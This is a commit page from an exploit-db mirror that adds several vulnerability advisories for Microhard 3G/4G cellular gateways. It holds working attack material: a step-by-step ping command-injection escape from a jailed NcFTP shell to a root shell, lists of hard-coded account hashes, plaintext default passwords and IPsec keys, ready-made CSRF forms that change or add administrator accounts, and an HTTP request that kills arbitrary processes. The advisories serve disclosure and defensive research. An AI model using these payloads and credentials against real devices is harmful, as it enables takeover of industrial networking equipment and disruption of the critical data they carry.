bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-07-18

Browse source 
10 changes to exploits/shellcodes

Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass
Linux (Ubuntu) - Other Users coredumps Can Be Read via setgid Directory and killpriv Bypass

Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials
QNAP Q'Center - change_passwd Command Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs RCE (Metasploit)
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root

Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)
This commit is contained in:
Offensive Security 2018-07-18 05:01:47 +00:00
parent a657b64301
commit 1f88d0a67a
12 changed files with 1821 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

291
exploits/hardware/local/45041.txt Normal file
View file

@ -0,0 +1,291 @@
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: The web shell application includes a service called Microhard Sh that is documented
only as 'reserved for internal use'. This service can be enabled by an authenticated
user within the Services menu in the web admin panel. This can also be enabled via CSRF
attack. When the service is enabled, a user 'msshc' is created on the system with password
'msshc' for SSH shell access on port 22. When connected, the user is dropped into a NcFTP
jailed environment, that has limited commands for file transfer administration. One of the
commands is a custom added 'ping' command that has a command injection vulnerability that
allows the attacker to escape the restricted environment and enter into a root shell terminal
that can execute commands as the root user.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5486
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5486.php
13.03.2018
--
1) Enable Microhard Sh service:
-------------------------------
http://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=start - Start the Microhard Sh (msshc) service
http://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=enable - Auto-enable (auto-start)
2) Check what happens when enabling Microhard Sh service:
---------------------------------------------------------
# cat /etc/init.d/msshc
#!/bin/sh /etc/rc.common
# Copyright (C) 2013 Microhardcorp
start() {
deluser msshc
rm -rf /tmp/msshc
mkdir -p /tmp/msshc
msshcshell=$(cat /etc/shells | grep -c "/etc/msshc.sh")
[ $msshcshell -gt 0 ] || echo "/etc/msshc.sh" >> /etc/shells
passwd=$(/sbin/uci get msshc.general.passwd)
echo "$passwd" >> /etc/passwd
}
stop() {
deluser msshc
rm -rf /tmp/msshc
}
3) Check the /etc/msshc.sh script:
----------------------------------
# cat /etc/msshc.sh
#!/bin/sh
# Copyright (C) 2013 Microhardcorp
/usr/bin/ncftp
exit 0
4) Check the /sbin/uci binary:
------------------------------
Usage: /sbin/uci [<options>] <command> [<arguments>]
Commands:
batch
export [<config>]
import [<config>]
changes [<config>]
commit [<config>]
add <config> <section-type>
add_list <config>.<section>.<option>=<string>
show [<config>[.<section>[.<option>]]]
get <config>.<section>[.<option>]
set <config>.<section>[.<option>]=<value>
delete <config>[.<section[.<option>]]
rename <config>.<section>[.<option>]=<name>
revert <config>[.<section>[.<option>]]
Options:
-c <path> set the search path for config files (default: /etc/config)
-d <str> set the delimiter for list values in uci show
-f <file> use <file> as input instead of stdin
-L do not load any plugins
-m when importing, merge data into an existing package
-n name unnamed sections on export (default)
-N don't name unnamed sections
-p <path> add a search path for config change files
-P <path> add a search path for config change files and use as default
-q quiet mode (don't print error messages)
-s force strict mode (stop on parser errors, default)
-S disable strict mode
-X do not use extended syntax on 'show'
# /sbin/uci get msshc.general.passwd
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
5) Check the NcFTP binary:
--------------------------
# /usr/bin/ncftp -h
Usage: ncftp [flags] [<host> | <directory URL to browse>]
Flags:
-u XX Use username XX instead of anonymous.
-p XX Use password XX with the username.
-P XX Use port number XX instead of the default FTP service port (21).
-j XX Use account XX with the username (rarely needed).
-F Dump a sample $HOME/.ncftp/firewall prefs file to stdout and exit.
Program version: NcFTP 3.2.5/474 Feb 02 2011, 05:13 PM
Library version: LibNcFTP 3.2.5 (January 17, 2011)
Build system: Linux DProBuilder 2.6.34.9-69.fc13.i686.PAE #1 SMP Tue Ma...
This is a freeware program by Mike Gleason (http://www.NcFTP.com).
A directory URL ends in a slash, i.e. ftp://ftp.freebsd.org/pub/FreeBSD/
Use ncftpget and ncftpput for command-line FTP and file URLs.
6) Go to jail:
--------------
lqwrm@metalgear:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 msshc@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:x9GG/Dlkg88058ilA2xyhYqllYRgZOTPu6reGS8K1Yg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
msshc@192.168.1.1's password:
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Copyright (c) 1992-2011 by Mike Gleason.
All rights reserved.
ncftp> ?
Commands may be abbreviated. 'help showall' shows hidden and unsupported
commands. 'help <command>' gives a brief description of <command>.
ascii close help mkdir put rename set umask
binary debug lls open pwd rhelp show
cd dir lrm passive quit rm site
chmod get ls ping quote rmdir type
For details, please see the manual ("man ncftp" at your regular shell prompt
or online at http://www.NcFTP.com/ncftp/doc/ncftp.html).
ncftp> help showall
Commands may be abbreviated. 'help showall' shows hidden and unsupported
commands. 'help <command>' gives a brief description of <command>.
? chmod exit ls mv pwd rhelp site
ascii close get mget open quit rm type
binary debug help mkdir passive quote rmdir umask
bye delete lls mls ping rename set
cd dir lrm mput put rglob show
For details, please see the manual ("man ncftp" at your regular shell prompt
or online at http://www.NcFTP.com/ncftp/doc/ncftp.html).
ncftp> ls
ls: must be connected to do that.
ncftp> man ncftp
man: no such command.
ncftp> pwd
pwd: must be connected to do that.
ncftp> show
anon-password NcFTP@
auto-ascii |.txt|.asc|.html|.htm|.css|.xml|.ini|.pl|.hqx|.cfg|.c|.h|.cpp|.hpp|.bat|.m3u|.pls|
auto-resume no
autosave-bookmark-changes no
confirm-close no
connect-timeout 20
control-timeout 135
logsize 10240
pager more
passive optional
progress-meter 2 (statbar)
redial-delay 20
save-passwords ask
show-status-in-xterm-titlebar no
so-bufsize 0 (use system default)
xfer-timeout 3600
yes-i-know-about-NcFTPd no
ncftp>
7) The Shawshank Redemption:
----------------------------
ncftp> ping -c1 -4 0.0.0.0 `id`
BusyBox v1.15.3 (2016-06-20 14:58:14 MDT) multi-call binary
Usage: ping [OPTIONS] HOST
Send ICMP ECHO_REQUEST packets to network hosts
Options:
-4, -6 Force IPv4 or IPv6 hostname resolution
-c CNT Send only CNT pings
-s SIZE Send SIZE data bytes in packets (default:56)
-I IFACE/IP Use interface or IP address as source
-W SEC Seconds to wait for the first response (default:10)
(after all -c CNT packets are sent)
-w SEC Seconds until ping exits (default:infinite)
(can exit earlier with -c CNT)
-q Quiet, only displays output at start
and when finished
ncftp>
8) Come on Andy:
----------------
ncftp> ping -c1 -4 0.0.0.0 && /bin/sh
PING 0.0.0.0 (0.0.0.0): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.423 ms
--- 0.0.0.0 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.423/0.423/0.423 ms
BusyBox v1.15.3 (2016-06-20 14:58:14 MDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.
/tmp/msshc # id ; uname -r
uid=0(root) gid=0(root)
2.6.32.9
/tmp/msshc #

99
exploits/hardware/remote/45040.txt Normal file
View file

@ -0,0 +1,99 @@
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
These sets of credentials are never exposed to the end-user and cannot be changed through
any normal operation of the gateway. Another vulnerability could allow an authenticated
attacker to gain root access. The vulnerability is due to default credentials. An attacker
could exploit this vulnerability by logging in using the default credentials.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5480
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php
13.03.2018
--
System/Web/FTP:
---------------
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
admin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:0:0:admin:/:/etc/m_cli/m_cli.sh
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
nobody:*:65534:65534:nobody:/var:/bin/false
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
upgrade:admin
testlab:testlab
testlab1:testlab1
admin:admin
msshc:msshc
BCLC config defaults:
---------------------
IPSec preshared key: DerekUsedThisSecureKeyToEncryptClientAccessIn2014
Access control user/pass: admin:5@lm0nIsG00d
NMS System setting pass: NotComplicated
Webclient setting user/pass: webclient:AlsoNotComplicated
System access control user/pass: readonly:ItIsAlmostFriday

238
exploits/hardware/webapps/45034.html Normal file
View file

@ -0,0 +1,238 @@
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: The application interface allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to
perform certain actions with administrative privileges if a logged-in user visits a malicious
web site.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5478
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php
13.03.2018
--
CSRF Change Admin password:
---------------------------
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="submit" value="1" />
<input type="hidden" name="pw1" value="nimda" />
<input type="hidden" name="pw2" value="nimda" />
<input type="hidden" name="passwdchange" value=" Change Passwd " />
<input type="hidden" name="user_add" value="" />
<input type="hidden" name="password_add" value="" />
<input type="hidden" name="password2_add" value="" />
<input type="hidden" name="Carrier_enable" value="0" />
<input type="hidden" name="Carrier_Status" value="0" />
<input type="hidden" name="Carrier_Settings" value="0" />
<input type="hidden" name="Carrier_Keepalive" value="0" />
<input type="hidden" name="Carrier_TrafficWatchdog" value="0" />
<input type="hidden" name="Carrier_DynamicDNS" value="0" />
<input type="hidden" name="Carrier_SMSConfig" value="0" />
<input type="hidden" name="Carrier_SMS" value="0" />
<input type="hidden" name="Carrier_DataUsage" value="0" />
<input type="hidden" name="Comport_enable" value="0" />
<input type="hidden" name="Comport_Status" value="0" />
<input type="hidden" name="Comport_Com0" value="0" />
<input type="hidden" name="Comport_Com1" value="0" />
<input type="hidden" name="Firewall_enable" value="0" />
<input type="hidden" name="Firewall_Status" value="0" />
<input type="hidden" name="Firewall_General" value="0" />
<input type="hidden" name="Firewall_Rules" value="0" />
<input type="hidden" name="Firewall_PortForwarding" value="0" />
<input type="hidden" name="Firewall_MACIPList" value="0" />
<input type="hidden" name="Firewall_Reset" value="0" />
<input type="hidden" name="GPS_enable" value="0" />
<input type="hidden" name="GPS_Location" value="0" />
<input type="hidden" name="GPS_Settings" value="0" />
<input type="hidden" name="GPS_Report" value="0" />
<input type="hidden" name="GPS_GpsGate" value="0" />
<input type="hidden" name="GPS_Recorder" value="0" />
<input type="hidden" name="GPS_LoadRecord" value="0" />
<input type="hidden" name="I/O_enable" value="0" />
<input type="hidden" name="I/O_Status" value="0" />
<input type="hidden" name="I/O_OUTPUT" value="0" />
<input type="hidden" name="Network_enable" value="0" />
<input type="hidden" name="Network_Status" value="0" />
<input type="hidden" name="Network_LAN" value="0" />
<input type="hidden" name="Network_Routes" value="0" />
<input type="hidden" name="Network_GRE" value="0" />
<input type="hidden" name="Network_PIMSM" value="0" />
<input type="hidden" name="Network_SNMP" value="0" />
<input type="hidden" name="Network_sdpServer" value="0" />
<input type="hidden" name="Network_LocalMonitor" value="0" />
<input type="hidden" name="Network_Port" value="0" />
<input type="hidden" name="System_enable" value="0" />
<input type="hidden" name="System_Settings" value="0" />
<input type="hidden" name="System_AccessControl" value="0" />
<input type="hidden" name="System_Services" value="0" />
<input type="hidden" name="System_Maintenance" value="0" />
<input type="hidden" name="System_Reboot" value="0" />
<input type="hidden" name="Tools_enable" value="0" />
<input type="hidden" name="Tools_Discovery" value="0" />
<input type="hidden" name="Tools_NetflowReport" value="0" />
<input type="hidden" name="Tools_NMSSettings" value="0" />
<input type="hidden" name="Tools_EventReport" value="0" />
<input type="hidden" name="Tools_Modbus" value="0" />
<input type="hidden" name="Tools_Websocket" value="0" />
<input type="hidden" name="Tools_SiteSurvey" value="0" />
<input type="hidden" name="Tools_Ping" value="0" />
<input type="hidden" name="Tools_TraceRoute" value="0" />
<input type="hidden" name="Tools_NetworkTraffic" value="0" />
<input type="hidden" name="VPN_enable" value="0" />
<input type="hidden" name="VPN_Summary" value="0" />
<input type="hidden" name="VPN_GatewayToGateway" value="0" />
<input type="hidden" name="VPN_ClientToGateway" value="0" />
<input type="hidden" name="VPN_VPNClientAccess" value="0" />
<input type="hidden" name="VPN_CertificateManagement" value="0" />
<input type="hidden" name="VPN_CiscoEasyVPNClient" value="0" />
<input type="submit" value="Change" />
</form>
</body>
</html>
CSRF Add Admin:
---------------
<html>
<body>
<form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
<input type="hidden" name="submit" value="1" />
<input type="hidden" name="pw1" value="" />
<input type="hidden" name="pw2" value="" />
<input type="hidden" name="user_add" value="testingus" />
<input type="hidden" name="password_add" value="123456" />
<input type="hidden" name="password2_add" value="123456" />
<input type="hidden" name="Carrier_enable" value="1" />
<input type="hidden" name="Carrier_Status" value="1" />
<input type="hidden" name="Carrier_Settings" value="1" />
<input type="hidden" name="Carrier_Keepalive" value="1" />
<input type="hidden" name="Carrier_TrafficWatchdog" value="1" />
<input type="hidden" name="Carrier_DynamicDNS" value="1" />
<input type="hidden" name="Carrier_SMSConfig" value="1" />
<input type="hidden" name="Carrier_SMS" value="1" />
<input type="hidden" name="Carrier_DataUsage" value="1" />
<input type="hidden" name="Comport_enable" value="1" />
<input type="hidden" name="Comport_Status" value="1" />
<input type="hidden" name="Comport_Com0" value="1" />
<input type="hidden" name="Comport_Com1" value="1" />
<input type="hidden" name="Firewall_enable" value="1" />
<input type="hidden" name="Firewall_Status" value="1" />
<input type="hidden" name="Firewall_General" value="1" />
<input type="hidden" name="Firewall_Rules" value="1" />
<input type="hidden" name="Firewall_PortForwarding" value="1" />
<input type="hidden" name="Firewall_MACIPList" value="1" />
<input type="hidden" name="Firewall_Reset" value="1" />
<input type="hidden" name="GPS_enable" value="1" />
<input type="hidden" name="GPS_Location" value="1" />
<input type="hidden" name="GPS_Settings" value="1" />
<input type="hidden" name="GPS_Report" value="1" />
<input type="hidden" name="GPS_GpsGate" value="1" />
<input type="hidden" name="GPS_Recorder" value="1" />
<input type="hidden" name="GPS_LoadRecord" value="1" />
<input type="hidden" name="I/O_enable" value="1" />
<input type="hidden" name="I/O_Status" value="1" />
<input type="hidden" name="I/O_OUTPUT" value="1" />
<input type="hidden" name="Network_enable" value="1" />
<input type="hidden" name="Network_Status" value="1" />
<input type="hidden" name="Network_LAN" value="1" />
<input type="hidden" name="Network_Routes" value="1" />
<input type="hidden" name="Network_GRE" value="1" />
<input type="hidden" name="Network_PIMSM" value="1" />
<input type="hidden" name="Network_SNMP" value="1" />
<input type="hidden" name="Network_sdpServer" value="1" />
<input type="hidden" name="Network_LocalMonitor" value="1" />
<input type="hidden" name="Network_Port" value="1" />
<input type="hidden" name="System_enable" value="1" />
<input type="hidden" name="System_Settings" value="1" />
<input type="hidden" name="System_AccessControl" value="1" />
<input type="hidden" name="System_Services" value="1" />
<input type="hidden" name="System_Maintenance" value="1" />
<input type="hidden" name="System_Reboot" value="1" />
<input type="hidden" name="Tools_enable" value="1" />
<input type="hidden" name="Tools_Discovery" value="1" />
<input type="hidden" name="Tools_NetflowReport" value="1" />
<input type="hidden" name="Tools_NMSSettings" value="1" />
<input type="hidden" name="Tools_EventReport" value="1" />
<input type="hidden" name="Tools_Modbus" value="1" />
<input type="hidden" name="Tools_Websocket" value="1" />
<input type="hidden" name="Tools_SiteSurvey" value="1" />
<input type="hidden" name="Tools_Ping" value="1" />
<input type="hidden" name="Tools_TraceRoute" value="1" />
<input type="hidden" name="Tools_NetworkTraffic" value="1" />
<input type="hidden" name="VPN_enable" value="1" />
<input type="hidden" name="VPN_Summary" value="1" />
<input type="hidden" name="VPN_GatewayToGateway" value="1" />
<input type="hidden" name="VPN_ClientToGateway" value="1" />
<input type="hidden" name="VPN_VPNClientAccess" value="1" />
<input type="hidden" name="VPN_CertificateManagement" value="1" />
<input type="hidden" name="VPN_CiscoEasyVPNClient" value="1" />
<input type="hidden" name="mhadd_user" value="Add User" />
<input type="submit" value="Request" />
</form>
</body>
</html>

114
exploits/hardware/webapps/45035.txt Normal file
View file

@ -0,0 +1,114 @@
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Service Control DoS
Vendor: Microhard Systems Inc.
Product web page: http://www.microhardcorp.com
Affected version: IPn4G 1.1.0 build 1098
IPn3Gb 2.2.0 build 2160
IPn4Gb 1.1.6 build 1184-14
IPn4Gb 1.1.0 Rev 2 build 1090-2
IPn4Gb 1.1.0 Rev 2 build 1086
Bullet-3G 1.2.0 Rev A build 1032
VIP4Gb 1.1.6 build 1204
VIP4G 1.1.6 Rev 3.0 build 1184-14
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
IPn3Gii / Bullet-3G 1.2.0 build 1076
IPn4Gii / Bullet-LTE 1.2.0 build 1078
BulletPlus 1.3.0 build 1036
Dragon-LTE 1.1.0 build 1036
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
RS232/485/422 devices!
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
the widespread deployment of cellular network infrastructure for critical data collection.
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
provides robust and secure wireless communication of Serial, USB and Ethernet data.
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
worth looking at!
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
system integration and design flexibility with dual Ethernet Ports and high power
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
Control Lists, the Dragon-LTE provides a solution for any cellular application!
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
Desc: There is an undocumented and hidden feature that allows an authenticated attacker
to list running processes in the operating system and send arbitrary signals to kill
any process running in the background including starting and stopping system services.
This impacts availability and can be triggered also by CSRF attacks that requires device
restart and/or factory reset to rollback malicious changes.
Tested on: httpd-ssl-1.0.0
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5481
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5481.php
13.03.2018
--
POST /cgi-bin/webif/status-processes.sh HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 34
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Origin: http://166.130.177.150
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://192.168.1.1/cgi-bin/webif/status-processes.sh
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: style=null
signal=SIGILL&pid=1337&kill=+Send+
===
Available services:
# ls /etc/init.d/
boot dmesgbackup gpsgatetr ipsecfwadd mh_product quagga sysctl vlan
checksync dnsmasq gpsr keepalive modbusd rcS systemmode vnstat
coova-chilli done gpsrecorderd led msmscomd salertd telnet watchdog
cron dropbear gred ledcon msshc sdpServer timezone webif
